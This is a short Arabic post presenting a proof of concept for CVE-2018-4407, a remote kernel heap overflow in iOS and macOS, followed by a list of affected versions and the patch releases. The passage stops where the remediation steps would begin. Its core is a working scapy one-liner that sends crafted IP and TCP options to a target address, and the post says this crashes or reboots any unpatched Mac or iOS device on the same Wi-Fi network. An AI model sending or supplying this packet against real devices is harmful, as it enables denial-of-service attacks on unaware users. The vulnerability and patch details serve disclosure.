
iOS 12 / OS X تجاوز سعة الكومة عن بعد في النواة (CVE-2018-4407) POC
*iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
أو استخدام السكربت
python check_icmp_dos.py 127.0.0.1
يسمح هذا الثغرة للمهاجم بمجرد الاتصال بنفس شبكة Wi-Fi، بإرسال حزم ضارة إلى أي مستخدم آخر غير مدرك، مما يتسبب في تعطل أو إعادة تشغيل أي جهاز Mac أو iOS. نظرًا لأن الثغرة موجودة في الكود الأساسي للشبكة في النظام، فلا يمكن لأي برنامج مكافحة فيروسات الدفاع ضدها.
الأجهزة التي تعمل بأنظمة التشغيل التالية معرضة للهجوم:
Apple iOS 11 والإصدارات الأقدم: جميع الأجهزة (بعض الأجهزة التي تم ترقيتها إلى iOS 12)
Apple macOS High Sierra (أعلى إصدار متأثر هو 10.13.6): جميع الأجهزة (تم الإصلاح عبر التحديث الأمني 2018-001)
Apple macOS Sierra (أعلى إصدار متأثر هو 10.12.6): جميع الأجهزة (تم الإصلاح عبر التحديث الأمني 2018-005)
Apple OS X El Capitan والإصدارات الأقدم: جميع الأجهزة
حاليًا، أصدرت Apple تحديث الإصدار ios12.1 الذي يصلح الثغرة. يُوصى المستخدمين بالتحقق من إصدار نظامهم، وفي حالة التأثر، اتخاذ إجراءات التصحيح فورًا. إجراءات إصلاح الثغرة كالتالي: